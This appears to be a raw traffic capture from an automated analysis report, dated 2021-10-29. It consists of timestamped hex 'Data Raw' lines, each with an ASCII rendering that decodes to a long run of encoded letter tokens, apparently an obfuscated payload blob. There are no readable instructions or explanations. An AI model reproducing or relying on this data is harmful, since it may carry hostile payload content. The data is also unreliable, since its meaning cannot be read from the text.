                                                  2021-10-29 18:29:53 UTC1279INData Raw: 63 59 20 4e 63 56 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4c 43 20 4d 56 20 59 43 20 72 49 20 59 63 20 63 49 20 72 57 20 4e 4e 4c 20 4e 4e 4d 20 56 57 20 4e 72 20 72 72 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 57 56 20 59 43 20 59 72 20 57 72 20 56 57 20 72 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 4c 59 20 59 4d 20 4c 57 20 57 72 20 57 43 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 57 20 57 56 20 4c 57 20 57 59 20 57 43 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 57 20 49 4d 20 4c 43 20 59 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 4d 20 59 63 20 56 72 20 4e 56 4e 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 56 20 4e 4e 56 20 59 43 20 59 49 20 4c 4c
                                                  Data Ascii: cY NcV NNV YC YV Vc N Ir NNr NVM LC MV YC rI Yc cI rW NNL NNM VW Nr rr rI YC cC NVr NCW NNM NCW NVV WL WV YC Yr Wr VW rL NCW NNV Yc LY YM LW Wr WC ML NCW NNV Yc VW WV LW WY WC ML NCW NNV Yc VW IM LC YV NNr NNM NCL WM Yc Vr NVN Yr Ir NVC Vc NV NNV YC YI LL
                                                  2021-10-29 18:29:53 UTC1280INData Raw: 63 49 20 59 43 20 56 63 20 4c 59 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4c 4e 20 49 59 20 59 72 20 72 49 20 63 63 20 4c 43 20 4e 72 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 59 63 20 72 49 20 59 43 20 56 57 20 49 4d 20 4e 4e 49 20 56 63 20 4e 4c 4c 20 4e 4e 4c 20 59 43 20 59 72 20 56 72 20 59 72 20 4d 4e 20 63 63 20 4e 56 63 20 4e 43 57 20 57 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 49 20 4c 57 20 72 49 20 59 43 20 72 49 20 4c 49 20 72 59 20 4e 4e 4c 20 4e 43 57 20 43 20 56 63 20 56 4c 4c 20 59 43 20 59 72 20 49 56 20 57 43 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 56 59 20 59 4e 20 59 72 20 59 4e 20 57 43 20 4e 4e 49 20 4e 56 4c 20 4e 43 72 20 4e 56 63 20 59 56 20 63 56 20 59 4c 20 59 63 20 57 56 20 4e
                                                  Data Ascii: cI YC Vc LY Ir NNr NNY LN IY Yr rI cc LC NrN NNr NNM NCM II Yc rI YC VW IM NNI Vc NLL NNL YC Yr Vr Yr MN cc NVc NCW WV YC rI YC Yr Ir NNr NNM NNN II LW rI YC rI LI rY NNL NCW C Vc VLL YC Yr IV WC NVc NCW NNV VY YN Yr YN WC NNI NVL NCr NVc YV cV YL Yc WV N
                                                  2021-10-29 18:29:53 UTC1282INData Raw: 20 4e 49 4d 20 63 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 4e 56 59 20 59 4c 20 59 59 20 4e 49 49 20 57 59 20 4d 59 20 57 49 20 72 72 20 4e 43 4e 20 4e 43 56 20 72 59 20 4c 56 20 56 63 20 49 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 63 20 4e 43 56 20 59 57 20 4c 49 20 59 4c 20 4e 49 72 20 63 4e 20 4e 56 56 20 56 59 4e 20 72 20 72 4e 20 56 63 20 57 59 20 59 43 20 59 72 20 57 72 20 4e 20 4e 43 56 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 4e 20 59 56 20 4c 72 20 57 4c 20 4e 56 56 20 56 63 20 4d 4d 20 4e 4e 56 20 59 43 20 59 72 20 4c 4c 20 59 43 20 4e 4c 49 20 4e 4e 57 20 49 4c 20 4e 4d 57 20 4e 4e 56 20 4c 49 20 56 63 20 4c 59 20 59 43 20 4e 56 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 57 63 20 59 43 20 72 49 20 59 43 20 59 72 20 4d 72 20 4e 4e 72 20 4e 4d
                                                  Data Ascii: NIM cC NNr NNM NCI NVY YL YY NII WY MY WI rr NCN NCV rY LV Vc IW Ir NNr NVM NCc NCV YW LI YL NIr cN NVV VYN r rN Vc WY YC Yr Wr N NCV NCW NNV YV YN YV Lr WL NVV Vc MM NNV YC Yr LL YC NLI NNW IL NMW NNV LI Vc LY YC NVc NNr NNM NCI Wc YC rI YC Yr Mr NNr NM
                                                  2021-10-29 18:29:53 UTC1283INData Raw: 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 56 20 56 72 20 4d 4e 20 59 72 20 49 72 20 4e 56 43 20 4e 4e 56 20 56 20 43 20 59 43 20 72 49 20 59 63 20 63 4e 20 49 63 20 4e 4e 63 20 4d 20 56 72 43 20 4e 4e 4d 20 59 43 20 63 72 20 59 4c 20 72 57 20 56 4e 49 20 56 4d 20 57 57 20 63 57 20 4e 43 4d 20 59 43 20 72 49 20 59 56 20 56 63 20 49 56 20 4e 20 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 4d 72 20 59 56 20 56 49 20 4d 4e 20 63 63 20 4e 56 4d 20 4e 43 57 20 56 72 4e 20 59 43 20 72 49 20 59 43 20 4c 59 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 4e 59 20 63 72 20 4e 4c 59 20 59 59 20 59 72 20 4c 63 20 57 43 20 49 4e 20 4e 43 57 20 4e 4e 56 20 59 56 20 4c 49 20 56 63 20 63 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 4c 20 4e 4e 49 20 56 63 20 4d 43 20 59 43 20
                                                  Data Ascii: NNM NCW NVV MV Vr MN Yr Ir NVC NNV V C YC rI Yc cN Ic NNc M VrC NNM YC cr YL rW VNI VM WW cW NCM YC rI YV Vc IV N r NCW NNV Yc Mr YV VI MN cc NVM NCW VrN YC rI YC LY Ir NNr NCC NNN NNY cr NLY YY Yr Lc WC IN NCW NNV YV LI Vc cW Ir NNr NVM NCL NNI Vc MC YC
                                                  2021-10-29 18:29:53 UTC1284INData Raw: 49 56 20 59 72 20 49 72 20 4e 56 43 20 4e 43 63 20 57 4d 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 4c 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20 49 49 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4c 4e 20 63 63 20 72 49 20 59 43 20 63 43 20 49 4d 20 4e 4e 49 20 57 4c 20 4d 72 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 49 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4d 4e 20 4e 4e 56 20 59 43 20 72 4c 20 56 20 59 4c 20 49 72 20 4e 4e 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4c 4c 20 72 49 20 59 43 20 4c 57 20 49 63 20 57 72 20 4e 4e 4c 20 4e 4e 4e 20 56 59 72 20 4c 4e 20 59 56 20 4c 49 20 63 43 20 4e 4c 49 20 57 49 20 4e 4e 57
                                                  Data Ascii: IV Yr Ir NVC NCc WM VYL NCr rI YC YY NNL NcV NLY NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI Vc II Ir NNr NVM NNN LN cc rI YC cC IM NNI WL Mr NNV YC Yr WL IM Ir NNr NVM MN NNV YC rL V YL Ir NNN NNM NCW NNV LL rI YC LW Ic Wr NNL NNN VYr LN YV LI cC NLI WI NNW
                                                  2021-10-29 18:29:53 UTC1285INData Raw: 56 20 4e 43 63 20 72 43 20 63 72 20 4e 56 72 20 59 56 20 63 63 20 4e 4e 63 20 72 57 20 49 72 20 56 20 57 4c 20 4d 43 20 4e 4e 56 20 59 43 20 59 49 20 59 63 20 72 57 20 63 4d 20 72 56 20 4e 56 63 20 4e 43 63 20 4e 4e 72 20 57 4c 20 4e 4d 49 20 59 43 20 59 72 20 57 72 20 4d 4d 20 4c 57 20 4e 72 63 20 4e 72 4c 20 56 43 59 20 59 72 20 56 72 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 56 20 57 4c 20 4e 4e 4d 20 59 43 20 4e 4e 56 20 59 43 20 59 72 20 49 72 20 4e 43 4d 20 4e 4e 4d 20 4e 43 57 20 57 4d 20 63 59 20 4e 4d 57 20 59 43 20 59 72 20 57 72 20 4e 56 43 20 57 57 20 4e 43 56 20 57 4e 20 56 43 20 59 72 20 72 49 20 72 57 20 59 57 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 72 57 20 59 59 20 72 57 20 49 57 20 56 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 72
                                                  Data Ascii: V NCc rC cr NVr YV cc NNc rW Ir V WL MC NNV YC YI Yc rW cM rV NVc NCc NNr WL NMI YC Yr Wr MM LW Nrc NrL VCY Yr Vr Yr Ir NNr NCV WL NNM YC NNV YC Yr Ir NCM NNM NCW WM cY NMW YC Yr Wr NVC WW NCV WN VC Yr rI rW YW IY NNM NCW NVV rW YY rW IW VCI NNr NNM NCL r
                                                  2021-10-29 18:29:53 UTC1287INData Raw: 20 4e 56 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 72 4e 20 43 20 59 4e 20 59 72 20 63 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 43 4d 20 59 43 20 72 49 20 4c 59 20 59 56 20 72 4d 20 4e 4e 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 57 4c 20 59 43 20 59 4e 20 59 72 20 49 56 20 4e 56 43 20 4e 4d 4e 20 4e 43 72 20 49 63 20 4c 63 20 59 49 20 56 4c 63 20 59 72 20 49 56 20 49 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 4c 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 63 20 63 43 20 72 49 20 59 59 20 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 4e 49 20 63 72 20 72 49 20 72 49 20 4c 4d 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 43 20 4e 43 57 20 4e 4e 56 20 4c 59 20 59 43 20 4d 4c 20 59 56 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4e
                                                  Data Ascii: NVY NNM NCW NNL rN C YN Yr cY NNr NNM NCW NCM YC rI LY YV rM NNV NNM NCW NNc WL YC YN Yr IV NVC NMN NCr Ic Lc YI VLc Yr IV II NNM NCW NNV YN LV YC Yr Ir NNr NNM NCW NVc cC rI YY YM Ir NNr NNc NNI cr rI rI LM Yr Ir NNr NNC NCW NNV LY YC ML YV Ir NNr NNL N
                                                  2021-10-29 18:29:53 UTC1288INData Raw: 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 4e 56 56 20 56 4c 63 20 59 4c 20 56 43 20 4c 56 20 57 72 20 4e 4d 56 20 4e 4e 4d 20 4e 43 4d 20 57 43 20 59 43 20 72 49 20 59 4e 20 4c 49 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 63 4c 20 63 4e 20 59 72 20 49 4e 20 4e 56 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 72 4e 20 43 20 72 49 20 59 72 20 63 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 43 49 20 59 43 20 72 49 20 4c 59 20 59 56 20 72 4d 20 4e 4e 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 72 57 20 57 59 20 4c 63 20 59 59 20 49 72 20 4e 4e 63 20 4e 56 4d 20 4e 4d 57 20 4e 4e 4d 20 56 43 20 4c 49 20 59 63 20 56 4c 56 20 49 72 20 4e 4e 63 20 57 59 20 4e 43 57 20 4e 4e 56 20 59 4e 20 4c 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e
                                                  Data Ascii: L NNY NNM NCM NVV VLc YL VC LV Wr NMV NNM NCM WC YC rI YN LI Ir NNr NNM NCW NNV YC cL cN Yr IN NVY NNM NCW NNL rN C rI Yr cc NNr NNM NCW NCI YC rI LY YV rM NNV NNM NCW NNc rW WY Lc YY Ir NNc NVM NMW NNM VC LI Yc VLV Ir NNc WY NCW NNV YN LV YC Yr Ir NNr NN
                                                  2021-10-29 18:29:53 UTC1289INData Raw: 20 59 43 20 72 56 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 4e 20 72 49 20 72 49 20 59 43 20 59 43 20 49 4d 20 56 57 20 4e 43 56 20 4e 43 49 20 4e 4e 56 20 59 56 20 59 49 20 56 4c 63 20 59 4e 20 4e 4e 72 20 4e 43 43 20 4e 56 4d 20 4e 4d 57 20 4e 4e 56 20 59 56 20 56 63 20 59 43 20 59 72 20 49 59 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 4d 20 57 4e 20 4e 4e 72 20 4e 4e 56 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 72 4e 20 63 20 49 63 20 4e 4e 72 20 57 57 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 72 20 59 43 20 59 72 20 63 57 20 4e 4e 56 20 4e 72 20 4e 4e 4e 20 4e 4e 56 20 59 43 20 59 56 20 72 57 20 49 57 20 57 72 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 4e 56 56 20 56 4c 63 20 59 4c 20 56 43 20 4c 56 20 57 72 20 4e
                                                  Data Ascii: YC rV Ir NNr NCC NNN NN rI rI YC YC IM VW NCV NCI NNV YV YI VLc YN NNr NCC NVM NMW NNV YV Vc YC Yr IY WI NNM NCW NNV YC rI YC YM WN NNr NNV WI NNV YC rW rN c Ic NNr WW NCW NNV YC rr YC Yr cW NNV Nr NNN NNV YC YV rW IW Wr NNY NNM NCM NVV VLc YL VC LV Wr N
                                                  2021-10-29 18:29:53 UTC1291INData Raw: 57 63 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 4c 20 4e 56 4d 20 4e 4e 56 20 63 56 20 63 4c 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 4e 43 20 4e 4e 56 20 72 56 20 72 49 20 59 43 20 59 72 20 4d 57 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4e 4e 72 20 4d 4c 20 59 43 20 59 43 20 59 72 20 49 43 20 4e 4e 4c 20 4e 4e 4c 20 56 20 4e 43 59 20 59 4e 20 72 49 20 59 56 20 4c 4c 20 57 72 20 4e 4d 56 20 4e 4e 56 20 4d 59 20 4e 43 56 20 59 63 20 56 4c 49 20 59 43 20 72 49 20 4e 56 63 20 4e 4e 59 20 4e 43 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 63 57 20 57 57 20 4e 4e 4d 20 4e 43 72 20 4e 56 4d 20 59 43 20 72 49 20 59 4e 20 4e 56 20 49 63 20 4e 43 4e 20 56 63 20 4c 63 20 4e 4e 56 20 59 43 20 59 72 20 72 49 20
                                                  Data Ascii: Wc YC rI YC Yr Ir NNr NCL NVM NNV cV cL YC Yr IY NCY cW NNC NNV rV rI YC Yr MW NNr NNM NVr NNr ML YC YC Yr IC NNL NNL V NCY YN rI YV LL Wr NMV NNV MY NCV Yc VLI YC rI NVc NNY NCN NCW NNV YC rI YC Yr cW WW NNM NCr NVM YC rI YN NV Ic NCN Vc Lc NNV YC Yr rI
                                                  2021-10-29 18:29:53 UTC1292INData Raw: 20 59 59 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 20 4e 43 63 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 56 4d 20 49 72 20 4e 4e 72 20 4e 4e 59 20 63 57 20 4e 57 59 20 59 4e 20 72 49 20 59 56 20 4c 57 20 57 72 20 4e 56 4d 20 4e 4e 20 4e 43 4e 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 49 57 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 56 63 20 4e 4e 63 20 56 59 20 59 49 20 4e 49 20 4e 57 43 20 4d 4e 20 4e 4e 72 20 4e 4e 4d 20 63 57 20 56 4c 57 20 59 43 20 72 49 20 59 63 20 4c 57 20 49 43 20 4e 4e 63 20 4e 56 59 20 4e 56 4d 20 4e 4e 59 20 57 4c 20 4e 49 59 20 59 43 20 59 72 20 49 56 20 57 72 20 4e 59 63 20 4e 43 43 20 57 57 20 59 59 20 4c 72 20 59 59 20 63 57 20 56 4e 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 4e 72 4c 20 72 57 20 59 43 20 72 49 20 4d 43
                                                  Data Ascii: YY Yr Ir NNI NN NCc NNV YC YV Vc VM Ir NNr NNY cW NWY YN rI YV LW Wr NVM NN NCN NNV YC YV Vc NIW Ir NNr NNY NVc NNc VY YI NI NWC MN NNr NNM cW VLW YC rI Yc LW IC NNc NVY NVM NNY WL NIY YC Yr IV Wr NYc NCC WW YY Lr YY cW VNc NNY NNM NCM II NrL rW YC rI MC
                                                  2021-10-29 18:29:53 UTC1294INData Raw: 4e 59 20 4c 43 20 4e 4e 72 20 72 49 20 72 49 20 59 56 20 63 43 20 4d 59 20 4e 56 59 20 56 72 49 20 57 57 20 4e 4e 56 20 59 43 20 59 43 20 56 4c 20 4c 56 20 63 72 20 4e 72 43 20 4e 4e 59 20 59 4c 20 4e 4e 56 20 59 43 20 59 72 20 63 59 20 4e 49 4c 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 43 4d 20 49 59 20 4c 4d 20 4c 63 20 56 43 72 20 72 49 20 4e 4c 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 4c 20 4e 4d 57 20 72 49 20 59 43 20 72 49 20 56 72 63 20 49 4d 20 4e 43 57 20 4e 56 4e 20 4e 72 56 20 59 56 20 4e 43 63 20 59 43 20 59 72 20 49 56 20 4e 20 56 72 72 20 4e 43 57 20 4e 4e 56 20 59 56 20 4e 72 63 20 56 4c 20 72 4d 20 63 72 20 4e 72 43 20 4e 4e 59 20 59 72 20 4e 4e 56 20 59 43 20 59 72 20 63 59 20 4e 49 4c 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 43 4d 20 49 59 20
                                                  Data Ascii: NY LC NNr rI rI YV cC MY NVY VrI WW NNV YC YC VL LV cr NrC NNY YL NNV YC Yr cY NIL Ir NNr NNY VCM IY LM Lc VCr rI NL NNr NNM NCM L NMW rI YC rI Vrc IM NCW NVN NrV YV NCc YC Yr IV N Vrr NCW NNV YV Nrc VL rM cr NrC NNY Yr NNV YC Yr cY NIL Ir NNr NNY VCM IY
                                                  2021-10-29 18:29:53 UTC1295INData Raw: 4e 4e 49 20 59 56 20 56 43 63 20 59 56 20 59 43 20 49 63 20 4e 4e 72 20 4e 4e 59 20 4c 43 20 56 4e 4c 20 59 43 20 72 49 20 59 63 20 4c 43 20 63 49 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 49 49 20 4c 59 20 72 49 20 59 43 20 56 57 20 4e 56 72 20 56 59 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 72 20 56 56 20 72 57 20 59 43 20 49 4e 20 57 43 20 59 49 20 4e 43 57 20 4e 4e 56 20 59 56 20 56 63 20 59 43 20 59 72 20 4d 57 20 63 63 20 4e 4e 4c 20 4e 43 57 20 59 4d 20 59 4e 20 72 49 20 59 43 20 72 4e 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 43 59 20 4c 20 4e 57 43 20 72 57 20 59 43 20 72 49 20 4e 4e 4c 20 4e 20 56 4e 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 57 59 20 57 4c 20 59 59 20 49 72 20 4e 4e 63 20 49 43 20 4c 43 20 4e 43 59 20 59 43 20 72 49 20 59 63 20 49 57 20
                                                  Data Ascii: NNI YV VCc YV YC Ic NNr NNY LC VNL YC rI Yc LC cI NNr NNM MC II LY rI YC VW NVr VYC NNM NCW NNI Vr VV rW YC IN WC YI NCW NNV YV Vc YC Yr MW cc NNL NCW YM YN rI YC rN Ir NNr NCC NCY L NWC rW YC rI NNL N VNC NCW NNV Yc WY WL YY Ir NNc IC LC NCY YC rI Yc IW
                                                  2021-10-29 18:29:53 UTC1296INData Raw: 43 20 4e 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 56 4e 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 57 49 20 59 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 63 4e 20 72 49 20 59 43 20 59 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4e 57 20 49 59 20 4e 4e 72 20 4e 4e 4d 20 72 72 20 4e 4e 4c 20 59 43 20 72 49 20 59 4e 20 59 72 20 49 72 20 4e 4e 72 20 49 4e 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 4e 59 20 72 57 20 59 43 20 59 72 20 56 56 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4d 20 59 43 20 72 49 20 59 43 20 59 4d 20
                                                  Data Ascii: C NI Ir NNr NNc NCW NNV YC rI VNc Yr Ir NNr NVc NCW NNV YC NWI YC Yr Ir NNL NNM NCW NNV cN rI YC YY Ir NNr NNM NCW NNV YC rI YC NNW IY NNr NNM rr NNL YC rI YN Yr Ir NNr IN NCW NNV YN rI YC Yr Ir NNr NNM NCW NNV NNY rW YC Yr VV NNY NNM NCW NNM YC rI YC YM
                                                  2021-10-29 18:29:53 UTC1298INData Raw: 57 20 4e 57 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 72 20 4e 4c 57 20 59 59 20 49 72 20 4e 4e 63 20 4e 4e 4c 20 63 57 20 4e 59 43 20 59 43 20 72 49 20 59 56 20 4c 43 20 56 56 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 43 20 4c 4c 20 43 20 63 56 20 59 72 20 4e 57 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 43 20 72 56 20 4e 4e 4d 20 4e 4e 63 20 4e 43 57 20 4e 4e 63 20 4c 4e 20 56 43 20 4c 63 20 56 4c 43 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 49 20 4e 4c 49 20 72 49 20 59 43 20 63 43 20 4e 4c 56 20 4e 56 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 56 63 20 4e 4c 63 20 59 43 20 59 72 20 57 72 20 57 43 20 56 43 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 72 20 4e 4c 63 20 59 72 20 49 72 20 4e 56 43 20 56 72
                                                  Data Ascii: W NWr NCW NNV Yc Vr NLW YY Ir NNc NNL cW NYC YC rI YV LC VVM NNY NNM NCM WC LL C cV Yr NWr NNr NNM NCW NNV YC rI YC YC rV NNM NNc NCW NNc LN VC Lc VLC NV NNr NNM NCI II NLI rI YC cC NLV NVc NNM NCW NNr Vc NLc YC Yr Wr WC VCr NCW NNV Yc Vr NLc Yr Ir NVC Vr
                                                  2021-10-29 18:29:53 UTC1299INData Raw: 4e 43 57 20 4e 4e 49 20 4c 59 20 59 56 20 57 4c 20 56 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4e 4e 49 20 57 4c 20 4e 43 20 59 43 20 59 72 20 49 56 20 49 4d 20 4e 43 57 20 57 72 20 4e 56 43 20 72 49 20 59 4e 20 59 72 20 4c 43 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 4e 43 59 20 4e 20 59 72 20 63 59 20 4e 59 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 4c 20 57 43 20 59 43 20 72 49 20 59 4e 20 72 56 20 49 72 20 4e 4e 72 20 4e 4e 57 20 4e 43 57 20 57 4d 20 59 43 20 72 72 20 4c 4e 20 59 72 20 57 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 72 49 20 72 49 20 4e 4e 63 20 59 72 20 4d 56 20 4e 63 20 4e 4e 4d 20 57 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4d 63 20 49 63 20 57 43 20 4e 4d 4e 20 4e 43 57 20 4e 4e 56 20 59 56 20 57
                                                  Data Ascii: NCW NNI LY YV WL VrC Ir NNr NVM NNN NNI WL NC YC Yr IV IM NCW Wr NVC rI YN Yr LC NV NNr NNM NCM NCY N Yr cY NYM Ir NNr NVM VL WC YC rI YN rV Ir NNr NNW NCW WM YC rr LN Yr WC NNr NNM NCW NNV rI rI NNc Yr MV Nc NNM WW NNV YC rI YC NMc Ic WC NMN NCW NNV YV W
                                                  2021-10-29 18:29:53 UTC1300INData Raw: 4c 20 49 4e 20 49 59 20 4e 4e 72 20 4e 4e 59 20 63 57 20 4e 56 59 20 59 43 20 72 49 20 59 56 20 49 57 20 4e 59 4d 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 4e 72 20 59 56 20 57 59 20 4d 20 59 72 20 49 72 20 4e 4e 63 20 49 43 20 4e 4e 4d 20 63 4d 20 59 49 20 59 43 20 72 57 20 59 43 20 4e 56 72 20 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 72 4c 20 4c 20 59 56 20 63 57 20 56 59 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 43 20 56 72 20 4e 72 56 20 72 57 20 49 57 20 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 56 20 56 43 20 59 43 20 72 57 20 49 57 20 59 59 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 4e 49 57 20 72 49 20 59 43 20 72 49 20 59 57 20 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 4c 20 72 43 20 4e 20 63 56 20 49 63 20 4e 4e 4c 20 4e 4e
                                                  Data Ascii: L IN IY NNr NNY cW NVY YC rI YV IW NYM NNr NNM NCL NNr YV WY M Yr Ir NNc IC NNM cM YI YC rW YC NVr NI NNM NCW NNI rL L YV cW VYY NNr NNM NCL NC Vr NrV rW IW M NNY NNM NCM WV VC YC rW IW YY NNY NNM NCM II NIW rI YC rI YW rI NNM NCW NNI VL rC N cV Ic NNL NN
                                                  2021-10-29 18:29:53 UTC1302INData Raw: 4d 4d 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 43 20 59 43 20 4c 4d 20 4e 49 4d 20 4e 56 4d 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 59 20 4c 63 20 63 4d 20 4e 59 59 20 59 72 20 49 72 20 4e 4e 63 20 56 4e 59 20 63 57 20 56 59 4c 20 59 43 20 72 49 20 59 56 20 49 57 20 56 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 49 63 20 56 72 20 72 49 20 59 43 20 59 72 20 4d 4e 20 63 63 20 4e 4e 56 20 4e 43 57 20 4e 57 56 20 59 4e 20 72 49 20 59 43 20 4e 57 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 49 49 20 4e 49 72 20 72 49 20 59 43 20 72 49 20 4c 57 20 4e 4e 57 20 4e 4e 57 20 4e 43 57 20 4e 4e 49 20 59 63 20 72 4d 20 63 4e 20 4e 49 4d 20 57 43 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 59 20 4c 63 20 4c 63 20 56 43 72 20 72 49 20 4c 49 20 4e 4e 72 20 4e 4e 4d 20
                                                  Data Ascii: MM NNM NCW NNI VC YC LM NIM NVM NNr NNM NNN IY Lc cM NYY Yr Ir NNc VNY cW VYL YC rI YV IW VN NNr NNM NCM Ic Vr rI YC Yr MN cc NNV NCW NWV YN rI YC NW Ir NNr NCC NNN II NIr rI YC rI LW NNW NNW NCW NNI Yc rM cN NIM WC NNr NNM NNN IY Lc Lc VCr rI LI NNr NNM
